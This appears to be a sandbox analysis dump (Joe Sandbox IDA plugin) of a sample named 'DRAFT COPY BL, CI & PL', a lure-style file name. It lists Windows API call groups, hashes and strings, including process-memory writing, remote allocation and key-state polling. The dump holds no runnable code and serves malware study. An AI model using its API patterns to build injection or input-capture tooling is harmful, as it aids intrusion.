                                                                  • Part of subcall function 00935A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00997896,?,?,00000000), ref: 00935A2C
                                                                  • Part of subcall function 00935A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00997896,?,?,00000000,?,?), ref: 00935A50
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                • String ID:
                                                                • API String ID: 327935632-0
                                                                • Opcode ID: 70dafd389bc9e65593882c6fe3fd465d9205ea5bca9d9c4adac727e023b1730f
                                                                • Instruction ID: ccd35bd6143c16865fccd3cc605f440ba8fbd607d077a42919dc3aa3147eb2d3
                                                                • Opcode Fuzzy Hash: 70dafd389bc9e65593882c6fe3fd465d9205ea5bca9d9c4adac727e023b1730f
                                                                • Instruction Fuzzy Hash: 81511635A05209DFCB00EFA8C484AADB7B8EF89320F058565E856AB312D730ED45CF90
                                                                APIs
                                                                • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0099E61F
                                                                • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0099E648
                                                                • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0099E687
                                                                  • Part of subcall function 00939837: __itow.LIBCMT ref: 00939862
                                                                  • Part of subcall function 00939837: __swprintf.LIBCMT ref: 009398AC
                                                                • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0099E6AC
                                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0099E6B4
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                • String ID:
                                                                • API String ID: 1389676194-0
                                                                • Opcode ID: cd254cfe182e980ec9e977da872a9b11a53b154e24a3f46ac1b506b46006f0f7
                                                                • Instruction ID: 3457247128ba96cddb1e9b6ca4f5b5e2cdced94eff3c9af404e7730f8d4c9fe5
                                                                • Opcode Fuzzy Hash: cd254cfe182e980ec9e977da872a9b11a53b154e24a3f46ac1b506b46006f0f7
                                                                • Instruction Fuzzy Hash: 4651EA39A00105DFCB01EF69C985AADBBF5EF89314F1480A5E819AB361CB71ED15DF50
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ce2f7fba934001f341c119aae7e2e7ac835cbbe48236adc15c9341c1fc99fd52
                                                                • Instruction ID: 1ecb24cb006fad8f2528adac96f760b64e931d13085681da21743e41c7e085bb
                                                                • Opcode Fuzzy Hash: ce2f7fba934001f341c119aae7e2e7ac835cbbe48236adc15c9341c1fc99fd52
                                                                • Instruction Fuzzy Hash: CB41D33590C104AFD760DF2CCE98FE9BBA8EB09330F154665F916A72E0C770AD41EA61
                                                                APIs
                                                                • GetCursorPos.USER32(?), ref: 00932357
                                                                • ScreenToClient.USER32(009F57B0,?), ref: 00932374
                                                                • GetAsyncKeyState.USER32(00000001), ref: 00932399
                                                                • GetAsyncKeyState.USER32(00000002), ref: 009323A7
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: AsyncState$ClientCursorScreen
                                                                • String ID:
                                                                • API String ID: 4210589936-0
                                                                • Opcode ID: 3203fd89d5b7a2b6949b433af9bdc7adcbce1e5d68b408e564f91b2ac8d9276c
                                                                • Instruction ID: e8d2a0fe4ab6712c1c5208cc21db01c1c2d9303c09b03034bb87c0634dc8bd92
                                                                • Opcode Fuzzy Hash: 3203fd89d5b7a2b6949b433af9bdc7adcbce1e5d68b408e564f91b2ac8d9276c
                                                                • Instruction Fuzzy Hash: 7A418275608119FBCF299F68CC44BE9BB78FB05760F20435AF829962A0C734AD90DF91
                                                                APIs
                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009863E7
                                                                • TranslateAcceleratorW.USER32(?,?,?), ref: 00986433
                                                                • TranslateMessage.USER32(?), ref: 0098645C
                                                                • DispatchMessageW.USER32(?), ref: 00986466
                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00986475
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                                • String ID:
                                                                • API String ID: 2108273632-0
                                                                • Opcode ID: 6114384d8db6b7629036eeecc0af07260f7689a03ddfb40f55bd65c18aa69480
                                                                • Instruction ID: 55f3f5447faf038a4bf96fe928780bdafbc43cb864f47841885d9ffd0cab6684
                                                                • Opcode Fuzzy Hash: 6114384d8db6b7629036eeecc0af07260f7689a03ddfb40f55bd65c18aa69480
                                                                • Instruction Fuzzy Hash: B331D631914646EFDB24EFB4DC44FFABBACAB01310F15026AE521CB2B0E7359445E760
                                                                APIs
                                                                • GetWindowRect.USER32(?,?), ref: 00988A30
                                                                • PostMessageW.USER32(?,00000201,00000001), ref: 00988ADA
                                                                • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00988AE2
                                                                • PostMessageW.USER32(?,00000202,00000000), ref: 00988AF0
                                                                • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00988AF8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: MessagePostSleep$RectWindow
                                                                • String ID:
                                                                • API String ID: 3382505437-0
                                                                • Opcode ID: 01b95f6290dcdf98eeca82dfd5ef54d34151feb7d08abf616d67803abaed1f9f
                                                                • Instruction ID: 84f34adbfba7951833f353f372d7030dfb9423005ab074f6c7458074588fe4e5
                                                                • Opcode Fuzzy Hash: 01b95f6290dcdf98eeca82dfd5ef54d34151feb7d08abf616d67803abaed1f9f
                                                                • Instruction Fuzzy Hash: 7631C271504219EBDF14DFA8DD4DA9F3BB9EB04325F108629F925E62D0C7B09914DBA0
                                                                APIs
                                                                • IsWindowVisible.USER32(?), ref: 0098B204
                                                                • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0098B221
                                                                • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0098B259
                                                                • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0098B27F
                                                                • _wcsstr.LIBCMT ref: 0098B289
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                • String ID:
                                                                • API String ID: 3902887630-0
                                                                • Opcode ID: cbb0771f30f353435684b0d116fed0bbab24df91941ff42d7ccdd955de5f446b
                                                                • Instruction ID: 732bd9b986b554d8e806a6082f97f83ebb55b90c24026b8689e4d13d2004e427
                                                                • Opcode Fuzzy Hash: cbb0771f30f353435684b0d116fed0bbab24df91941ff42d7ccdd955de5f446b
                                                                • Instruction Fuzzy Hash: 0F21F532604204BBEB25AB799C09E7F7B9CDF99760F144129FC09DA2A1EB659C409760
                                                                APIs
                                                                  • Part of subcall function 00932612: GetWindowLongW.USER32(?,000000EB), ref: 00932623
                                                                • GetWindowLongW.USER32(?,000000F0), ref: 009BB192
                                                                • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 009BB1B7
                                                                • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 009BB1CF
                                                                • GetSystemMetrics.USER32(00000004), ref: 009BB1F8
                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,009A0E90,00000000), ref: 009BB216
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Window$Long$MetricsSystem
                                                                • String ID:
                                                                • API String ID: 2294984445-0
                                                                • Opcode ID: 1b3b74d506ee215d9ba4e5eb38e10d45a852e23f3f45b78ef4a321c9e8756206
                                                                • Instruction ID: e47747481a4b9f1158e57c29db6631a088169984f8776c5e4463c8659a572d42
                                                                • Opcode Fuzzy Hash: 1b3b74d506ee215d9ba4e5eb38e10d45a852e23f3f45b78ef4a321c9e8756206
                                                                • Instruction Fuzzy Hash: C8219171928655AFCB209F38DD14AAA3BA8FB15771F114B28F932D71E0E7709910DB90
                                                                APIs
                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00989320
                                                                  • Part of subcall function 00937BCC: _memmove.LIBCMT ref: 00937C06
                                                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00989352
                                                                • __itow.LIBCMT ref: 0098936A
                                                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00989392
                                                                • __itow.LIBCMT ref: 009893A3
                                                                Similarity
                                                                • API ID: MessageSend$__itow$_memmove
                                                                • String ID:
                                                                • API String ID: 2983881199-0
                                                                • Opcode ID: 790cb651bffd0b1ccb39cd94c8131a1df2ed769086b78ba10758229ac3543abd
                                                                • Instruction ID: 47cdb049bd89dc422ee803353d065cdb7fc47135c056ea742253a9aa29354612
                                                                • Opcode Fuzzy Hash: 790cb651bffd0b1ccb39cd94c8131a1df2ed769086b78ba10758229ac3543abd
                                                                • Instruction Fuzzy Hash: 2921C831704208BBDB20BAA58C85FBE7BADEB89714F084026FD45E72D1D6B08D459B91
                                                                APIs
                                                                • IsWindow.USER32(00000000), ref: 009A5A6E
                                                                • GetForegroundWindow.USER32 ref: 009A5A85
                                                                • GetDC.USER32(00000000), ref: 009A5AC1
                                                                • GetPixel.GDI32(00000000,?,00000003), ref: 009A5ACD
                                                                • ReleaseDC.USER32(00000000,00000003), ref: 009A5B08
                                                                Similarity
                                                                • API ID: Window$ForegroundPixelRelease
                                                                • String ID:
                                                                • API String ID: 4156661090-0
                                                                • Opcode ID: 3cfb1b0d2e8c57c35b2548ad0caf684a25a9829ae242d5dbe912404ae49e4e71
                                                                • Instruction ID: 5a2c565ba7a84ca3a704c716c60bfed2ba621c4368ea679731644954b5f9a514
                                                                • Opcode Fuzzy Hash: 3cfb1b0d2e8c57c35b2548ad0caf684a25a9829ae242d5dbe912404ae49e4e71
                                                                • Instruction Fuzzy Hash: 8C218135A00504EFDB14EFA9DD94B9ABBF5EF89310F148579F80997362CA70AD01DB90
                                                                APIs
                                                                • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0093134D
                                                                • SelectObject.GDI32(?,00000000), ref: 0093135C
                                                                • BeginPath.GDI32(?), ref: 00931373
                                                                • SelectObject.GDI32(?,00000000), ref: 0093139C
                                                                Similarity
                                                                • API ID: ObjectSelect$BeginCreatePath
                                                                • String ID:
                                                                • API String ID: 3225163088-0
                                                                • Opcode ID: 177b06b8484c275fa861073ef4db8ee57e13eed404659955910c59403c043d67
                                                                • Instruction ID: 3a33b9db52ed7929e5b559e323b0c83f3a0d68bceb2a54f3c85effb3cbdd2603
                                                                • Opcode Fuzzy Hash: 177b06b8484c275fa861073ef4db8ee57e13eed404659955910c59403c043d67
                                                                • Instruction Fuzzy Hash: 45217C30828B08EFDB10DF29ED047B97BA8FB003A5F154226F920961B0D7719C95EF91
                                                                APIs
                                                                Similarity
                                                                • API ID: _memcmp
                                                                • String ID:
                                                                • API String ID: 2931989736-0
                                                                • Opcode ID: cacd78629bda4d9d52ec9564bd60deeb365a61037b8e918e2c353d51dc1bbec4
                                                                • Instruction ID: a098669f8e2165e4bb9d038585f799a209139acad195d363896e04360ba18218
                                                                • Opcode Fuzzy Hash: cacd78629bda4d9d52ec9564bd60deeb365a61037b8e918e2c353d51dc1bbec4
                                                                • Instruction Fuzzy Hash: 0901B5B26402057BD204BB169D52FBBB35CDEA1388B084425FD4597382EB54EE1583A1
                                                                APIs
                                                                • GetCurrentThreadId.KERNEL32 ref: 00994ABA
                                                                • __beginthreadex.LIBCMT ref: 00994AD8
                                                                • MessageBoxW.USER32(?,?,?,?), ref: 00994AED
                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00994B03
                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00994B0A
                                                                Similarity
                                                                • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                • String ID:
                                                                • API String ID: 3824534824-0
                                                                • Opcode ID: 42a6d10d609699d0d7ccff82188d6d691f7cd9e72303df15facbc7d5688f9b01
                                                                • Instruction ID: dc00cdd2ac9578ecd4850740d776ae26c07c589f3174cbee1a0d7d91914b279d
                                                                • Opcode Fuzzy Hash: 42a6d10d609699d0d7ccff82188d6d691f7cd9e72303df15facbc7d5688f9b01
                                                                • Instruction Fuzzy Hash: F611047691D608BBCB018FACAC08EEF7FACEB49320F154369F924D3260D671C90497A0
                                                                APIs
                                                                • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0098821E
                                                                • GetLastError.KERNEL32(?,00987CE2,?,?,?), ref: 00988228
                                                                • GetProcessHeap.KERNEL32(00000008,?,?,00987CE2,?,?,?), ref: 00988237
                                                                • HeapAlloc.KERNEL32(00000000,?,00987CE2,?,?,?), ref: 0098823E
                                                                • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00988255
                                                                Similarity
                                                                • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                • String ID:
                                                                • API String ID: 842720411-0
                                                                • Opcode ID: 2ec05eec5ba1069a82947bd9b298aa4c1ccdaebcbcd4d6e4a3c8f762128cf338
                                                                • Instruction ID: 651268e69381b4020a0bcf6aae1060d1499ea23ed425cf3e4d475fa4fce07cb1
                                                                • Opcode Fuzzy Hash: 2ec05eec5ba1069a82947bd9b298aa4c1ccdaebcbcd4d6e4a3c8f762128cf338
                                                                • Instruction Fuzzy Hash: EF0162B1214604FFDB105FA9DD58D677BACEF857A47500529F819C2220DA318C00DB70
                                                                APIs
                                                                • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00987044,80070057,?,?,?,00987455), ref: 00987127
                                                                • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00987044,80070057,?,?), ref: 00987142
                                                                • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00987044,80070057,?,?), ref: 00987150
                                                                • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00987044,80070057,?), ref: 00987160
                                                                • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00987044,80070057,?,?), ref: 0098716C
                                                                Similarity
                                                                • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                • String ID:
                                                                • API String ID: 3897988419-0
                                                                • Opcode ID: 2343eefcf937fc8b6a20785999d5d7b384d942238054ae134c9e021ba1f392cf
                                                                • Instruction ID: af26c381626598dfac9ab48ba3e609df8460d66de380ac898c485d16ea97ab60
                                                                • Opcode Fuzzy Hash: 2343eefcf937fc8b6a20785999d5d7b384d942238054ae134c9e021ba1f392cf
                                                                • Instruction Fuzzy Hash: 7D018472619208BBDB119FA4DD88BAABBEDEF447A1F240164FD06D2310D731DD4097A0
                                                                APIs
                                                                • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00995260
                                                                • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0099526E
                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00995276
                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00995280
                                                                • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 009952BC
                                                                Similarity
                                                                • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                • String ID:
                                                                • API String ID: 2833360925-0
                                                                • Opcode ID: 0b85e24de812e7a59090dc952b33bd22b78bb9b76b3ae6dc7e8935329eb09eeb
                                                                • Instruction ID: 191042ff43921aabbb1e69846712b98f099ae87cdf4bc37546d832b78e6bd645
                                                                • Opcode Fuzzy Hash: 0b85e24de812e7a59090dc952b33bd22b78bb9b76b3ae6dc7e8935329eb09eeb
                                                                • Instruction Fuzzy Hash: 5F016931D19A1DDBCF00EFE8ED58AEEBB78FB09721F420566E951F2240CB3055509BA1
                                                                APIs
                                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00988121
                                                                • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0098812B
                                                                • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0098813A
                                                                • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00988141
                                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00988157
                                                                Similarity
                                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                • String ID:
                                                                • API String ID: 44706859-0
                                                                • Opcode ID: cae595c21de27f3281cbe6918e8bfc37931f32f01a0aa6bf61af2b0b1cc07913
                                                                • Instruction ID: 1ac45d618b6dca70bfab7882ba4fd026c0bcb146d761f0d6c3d3c4d85c732dfe
                                                                • Opcode Fuzzy Hash: cae595c21de27f3281cbe6918e8bfc37931f32f01a0aa6bf61af2b0b1cc07913
                                                                • Instruction Fuzzy Hash: F1F04FB1258304BFEB116FA9EC9CE673BACEF49764B400529F945C6260CF619941EB70
                                                                APIs
                                                                • GetDlgItem.USER32(?,000003E9), ref: 0098C1F7
                                                                • GetWindowTextW.USER32(00000000,?,00000100), ref: 0098C20E
                                                                • MessageBeep.USER32(00000000), ref: 0098C226
                                                                • KillTimer.USER32(?,0000040A), ref: 0098C242
                                                                • EndDialog.USER32(?,00000001), ref: 0098C25C
                                                                Similarity
                                                                • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                • String ID:
                                                                • API String ID: 3741023627-0
                                                                • Opcode ID: 4ca97989a565a3eac42738c1d7659f4670ec73f80e47575613f2479ce6281213
                                                                • Instruction ID: 6b335203c28d09e3a1e56488e0bca0e2166963db3323194d7431d99cc0980433
                                                                • Opcode Fuzzy Hash: 4ca97989a565a3eac42738c1d7659f4670ec73f80e47575613f2479ce6281213
                                                                • Instruction Fuzzy Hash: A901DB70414708A7EB206B64DD5EF9677BCFF00B05F000769F952915E0DBF4A9449B50
                                                                APIs
                                                                • EndPath.GDI32(?), ref: 009313BF
                                                                • StrokeAndFillPath.GDI32(?,?,0096B888,00000000,?), ref: 009313DB
                                                                • SelectObject.GDI32(?,00000000), ref: 009313EE
                                                                • DeleteObject.GDI32 ref: 00931401
                                                                • StrokePath.GDI32(?), ref: 0093141C
                                                                Similarity
                                                                • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                • String ID:
                                                                • API String ID: 2625713937-0

APIs
  • Part of subcall function 00950DB6: std::exception::exception.LIBCMT ref: 00950DEC
  • Part of subcall function 00950DB6: __CxxThrowException@8.LIBCMT ref: 00950E01
  • Part of subcall function 00937DE1: _memmove.LIBCMT ref: 00937E22
  • Part of subcall function 00937A51: _memmove.LIBCMT ref: 00937AAB
• __swprintf.LIBCMT ref: 00942ECD
Strings
• \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00942D66
Similarity
• API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
• String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
• API String ID: 1943609520-557222456

APIs
  • Part of subcall function 00934750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00934743,?,?,009337AE,?), ref: 00934770
• CoInitialize.OLE32(00000000), ref: 0099B9BB
• CoCreateInstance.OLE32(009C2D6C,00000000,00000001,009C2BDC,?), ref: 0099B9D4
• CoUninitialize.OLE32 ref: 0099B9F1
  • Part of subcall function 00939837: __itow.LIBCMT ref: 00939862
  • Part of subcall function 00939837: __swprintf.LIBCMT ref: 009398AC
Strings
Similarity
• API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
• String ID: .lnk
• API String ID: 2126378814-24824748

APIs
• __startOneArgErrorHandling.LIBCMT ref: 009550AD
  • Part of subcall function 009600F0: __87except.LIBCMT ref: 0096012B
Strings
Similarity
• API ID: ErrorHandling__87except__start
• String ID: pow
• API String ID: 2905807303-2276729525

APIs
Strings
Similarity
• API ID: _memset$_memmove
• String ID: ERCP
• API String ID: 2532777613-1384759551

APIs
  • Part of subcall function 009914BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00989296,?,?,00000034,00000800,?,00000034), ref: 009914E6
• SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0098983F
  • Part of subcall function 00991487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,009892C5,?,?,00000800,?,00001073,00000000,?,?), ref: 009914B1
  • Part of subcall function 009913DE: GetWindowThreadProcessId.USER32(?,?), ref: 00991409
  • Part of subcall function 009913DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0098925A,00000034,?,?,00001004,00000000,00000000), ref: 00991419
  • Part of subcall function 009913DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0098925A,00000034,?,?,00001004,00000000,00000000), ref: 0099142F
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 009898AC
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 009898F9
Strings
Similarity
• API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
• String ID: @
• API String ID: 4150878124-2766056989

APIs
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,009BF910,00000000,?,?,?,?), ref: 009B79DF
• GetWindowLongW.USER32 ref: 009B79FC
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 009B7A0C
Strings
Similarity
• API ID: Window$Long
• String ID: SysTreeView32
• API String ID: 847901565-1698111956

APIs
• SendMessageW.USER32(00000000,00001009,00000000,?), ref: 009B7461
• SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 009B7475
• SendMessageW.USER32(?,00001002,00000000,?), ref: 009B7499
Strings
Similarity
• API ID: MessageSend$Window
• String ID: SysMonthCal32
• API String ID: 2326795674-1439706946

APIs
• SendMessageW.USER32(00000000,00000469,?,00000000), ref: 009B7C4A
• SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 009B7C58
• DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 009B7C5F
Strings
Similarity
• API ID: MessageSend$DestroyWindow
• String ID: msctls_updown32
• API String ID: 4014797782-2298589950

APIs
• SendMessageW.USER32(00000000,00000180,00000000,?), ref: 009B6D3B
• SendMessageW.USER32(?,00000186,00000000,00000000), ref: 009B6D4B
• MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 009B6D70
Strings
Similarity
• API ID: MessageSend$MoveWindow
• String ID: Listbox
• API String ID: 3315199576-2633736733

APIs
• SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 009B7772
• SendMessageW.USER32(?,00000406,00000000,00640000), ref: 009B7787
• SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 009B7794
Strings
Similarity
• API ID: MessageSend
• String ID: msctls_trackbar32
• API String ID: 3850602802-1010561917
                                                                APIs
